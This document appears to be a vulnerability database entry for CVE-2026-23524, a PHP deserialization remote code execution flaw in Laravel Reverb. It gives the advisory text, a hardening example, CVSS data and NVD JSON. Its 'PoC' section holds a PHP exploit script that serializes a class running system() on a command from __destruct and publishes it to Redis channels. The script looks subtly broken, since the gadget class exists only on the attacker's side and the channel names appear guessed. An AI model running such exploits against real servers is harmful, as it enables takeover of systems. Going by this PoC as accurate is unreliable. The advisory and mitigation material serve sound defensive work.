Security Vulnerability Report
CVE-2026-23524 CVSS 9.8 CRITICAL

CVE-2026-23524

Published: 2026-01-21 22:15:50
Last Modified: 2026-03-06 20:02:37

Description

Laravel Reverb provides a real-time WebSocket communication backend for Laravel applications. In versions 1.6.3 and below, Reverb passes data from the Redis channel directly into PHP’s unserialize() function without restricting which classes can be instantiated, which leaves users vulnerable to Remote Code Execution. The exploitability of this vulnerability is increased because Redis servers are commonly deployed without authentication, but only affects Laravel Reverb when horizontal scaling is enabled (REVERB_SCALING_ENABLED=true). This issue has been fixed in version 1.7.0. As a workaround, require a strong password for Redis access and ensure the service is only accessible via a private network or local loopback, and/or set REVERB_SCALING_ENABLED=false to bypass the vulnerable logic entirely (if the environment uses only one Reverb node).
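The root cause described above is CWE-502 style deserialization: an object graph arriving over the Redis channel is handed to unserialize() with no restriction on which classes may be instantiated, so any autoloadable class with a magic method (__destruct, __wakeup, __toString, ...) becomes a gadget. The PHP below is an added example, not Laravel Reverb's code and not the content of the referenced patch commit; it contrasts the unrestricted call with the `allowed_classes` option PHP has offered since 7.0 and with a JSON transport that cannot express object instantiation at all. The serialized message and the function names are constructed for illustration.

```php
<?php
// Added example (not Laravel Reverb's code): unrestricted unserialize() on a
// message from a shared Redis channel versus hardened alternatives.
declare(strict_types=1);

// Constructed stand-in for a serialized PHP object received from Redis. Here it
// is a harmless stdClass; in the vulnerable pattern the attacker picks the class.
$untrusted = 'O:8:"stdClass":1:{s:3:"cmd";s:2:"id";}';

// Vulnerable pattern: every loadable class may be instantiated and its magic
// methods will run during or after deserialization.
function decodeUnsafe(string $message): mixed
{
    return unserialize($message);
}

// Hardened pattern 1: forbid object instantiation entirely. Objects in the
// payload come back as __PHP_Incomplete_Class and no magic methods execute.
function decodeNoObjects(string $message): mixed
{
    return unserialize($message, ['allowed_classes' => false]);
}

// Hardened pattern 2: explicit allow-list, and reject anything outside it
// before the value is used (unknown classes still become __PHP_Incomplete_Class).
function decodeAllowListed(string $message, array $allowed): mixed
{
    $value = unserialize($message, ['allowed_classes' => $allowed]);
    if ($value instanceof __PHP_Incomplete_Class) {
        throw new UnexpectedValueException('Rejected object of non-allow-listed class');
    }
    return $value;
}

// Hardened pattern 3 (preferred for inter-node messages): do not use PHP
// serialization at all. JSON carries only scalars, arrays and strings.
function decodeJson(string $message): array
{
    $decoded = json_decode($message, true, 512, JSON_THROW_ON_ERROR);
    if (!is_array($decoded)) {
        throw new UnexpectedValueException('Expected a JSON object or array');
    }
    return $decoded;
}

// Demonstration on the constructed message.
var_dump(get_class(decodeUnsafe($untrusted)));     // stdClass: object was instantiated
var_dump(get_class(decodeNoObjects($untrusted)));  // __PHP_Incomplete_Class
try {
    decodeAllowListed($untrusted, ['ArrayObject']); // stdClass is not allow-listed
} catch (UnexpectedValueException $e) {
    echo $e->getMessage(), PHP_EOL;
}
var_dump(decodeJson('{"event":"message","channel":"chat"}'));
```

Whichever decoder is used, the workaround in the description still applies: authenticate Redis and keep it off untrusted networks, because the channel is a trust boundary between nodes, and disable scaling on single-node deployments so the code path is never reached.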

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:laravel:reverb:*:*:*:*:*:*:*:* - VULNERABLE
Laravel Reverb < 1.7.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
PHP
<?php
// CVE-2026-23524 PoC - Laravel Reverb Unserialize RCE
// Target: Laravel Reverb <= 1.6.3 with REVERB_SCALING_ENABLED=true

class LaravelReverbExploit {
    public $cmd;

    function __destruct() {
        system($this->cmd);
    }
}

// Generate malicious serialized payload
$exploit = new LaravelReverbExploit();
$exploit->cmd = 'id > /tmp/pwned.txt';
$payload = serialize($exploit);
echo "Malicious Payload: " . $payload . "\n";

// Connect to Redis and publish to Reverb channel
$redis = new Redis();
$redis->connect('127.0.0.1', 6379);

// Publish to Reverb's presence channel
$redis->publish('reverb:presence', $payload);
$redis->publish('reverb:private', $payload);
echo "Payload sent to Redis channel\n";

// Alternative: Using Predis library
// $predis = new Predis\Client();
// $predis->publish('reverb:presence', $payload);
?>

References

Weakness: CWE-502 (Deserialization of Untrusted Data)
https://cwe.mitre.org/data/definitions/502.html - Technical Description
https://github.com/laravel/reverb/commit/9ec26f8ffbb701f84920dd0bb9781a1797591f1a - Patch
https://github.com/laravel/reverb/releases/tag/v1.7.0 - Product, Release Notes
https://github.com/laravel/reverb/security/advisories/GHSA-m27r-m6rx-mhm4 - Mitigation, Vendor Advisory
https://laravel.com/docs/12.x/reverb#scaling - Technical Description

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-23524", "sourceIdentifier": "[email protected]", "published": "2026-01-21T22:15:50.280", "lastModified": "2026-03-06T20:02:37.250", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Laravel Reverb provides a real-time WebSocket communication backend for Laravel applications. In versions 1.6.3 and below, Reverb passes data from the Redis channel directly into PHP’s unserialize() function without restricting which classes can be instantiated, which leaves users vulnerable to Remote Code Execution. The exploitability of this vulnerability is increased because Redis servers are commonly deployed without authentication, but only affects Laravel Reverb when horizontal scaling is enabled (REVERB_SCALING_ENABLED=true). This issue has been fixed in version 1.7.0. As a workaround, require a strong password for Redis access and ensure the service is only accessible via a private network or local loopback, and/or set REVERB_SCALING_ENABLED=false to bypass the vulnerable logic entirely (if the environment uses only one Reverb node)."}, {"lang": "es", "value": "Laravel Reverb proporciona un backend de comunicación WebSocket en tiempo real para aplicaciones Laravel. En las versiones 1.6.3 e inferiores, Reverb pasa datos del canal Redis directamente a la función unserialize() de PHP sin restringir qué clases pueden ser instanciadas, lo que deja a los usuarios vulnerables a la ejecución remota de código. La explotabilidad de esta vulnerabilidad se incrementa porque los servidores Redis se implementan comúnmente sin autenticación, pero solo afecta a Laravel Reverb cuando el escalado horizontal está habilitado (REVERB_SCALING_ENABLED=true). Este problema ha sido solucionado en la versión 1.7.0. Como solución alternativa, requiera una contraseña fuerte para el acceso a Redis y asegúrese de que el servicio solo sea accesible a través de una red privada o loopback local, y/o configure REVERB_SCALING_ENABLED=false para eludir completamente la lógica vulnerable (si el entorno utiliza solo un nodo Reverb)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-502"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:laravel:reverb:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.7.0", "matchCriteriaId": "AC0C178D-8618-4963-8AB2-75B260023D0A"}]}]}], "references": [{"url": "https://cwe.mitre.org/data/definitions/502.html", "source": "[email protected]", "tags": ["Technical Description"]}, {"url": "https://github.com/laravel/reverb/commit/9ec26f8ffbb701f84920dd0bb9781a1797591f1a", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/laravel/reverb/releases/tag/v1.7.0", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/laravel/reverb/security/advisories/GHSA-m27r-m6rx-mhm4", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}, {"url": "https://laravel.com/docs/12.x/reverb#scaling", "source": "[email protected]", "tags": ["Technical Description"]}]}}